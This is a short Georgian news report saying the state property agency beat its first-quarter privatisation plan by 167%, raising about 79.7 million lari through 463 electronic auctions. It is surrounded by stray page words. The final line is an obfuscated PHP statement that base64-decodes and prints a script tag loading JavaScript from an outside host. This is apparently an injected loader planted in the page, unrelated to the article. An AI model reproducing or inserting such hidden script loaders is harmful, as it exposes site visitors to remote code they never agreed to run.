celsiusi
ავერსი შნაიდერი

 ქონების ეროვნული სააგენტოს ინფორმაციით, პირველი კვარტლის პრივატიზაციის გეგმა გადაჭარბებით, 167%-ით შესრულდა.

სააგენტოს ინფორმაციით, საანგარიშო პერიოდში ჯამში 79.7 მლნ ლარის ქონება გავიდა გასაყიდად, საიდანაც ბიუჯეტმა 60.08 მლნ ლარის შემოსავალი მიიღო.

"ეკონომიკის სამინისტროს სახელმწიფო ქონების ეროვნულმა სააგენტომ, მიმდინარე წლის პირველი კვარტლის საპრივატიზებო გეგმა გადაჭარბებით შეასრულა. აქტიური პრივატიზების შედეგად, სააგენტომ ჯამში 79 707 625 ლარის მობილიზება მოახდინა, საიდანაც საპრივატიზებო გეგმით გათვალისწინებული 36 000 000 ლარის ნაცვლად სახელმწიფო ბიუჯეტში 60 086 446 ლარის გადარიცხვა უზრუნველყო, შედეგად, პირველი კვარტლის გეგმა გადაჭარბებით 167%-ით შესრულდა. აღნიშნულ პერიოდში სააგენტომ 463 ელექტრონული აუქციონი გამოაცხადა" - წერია სააგენტოს მიერ გავრცელებულ განცხადებაში.

სააგენტო წერს, რომ აქტიურად აგრძელებს სახელმწიფო ქონების დაჩქარებული პრივატიზაციის პროცესს და კერძო სექტორს სხვადასხვა, საინვესტიციოდ მიმზიდველ უძრავ ქონებას პროაქტიულად შესთავაზებს.

150
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");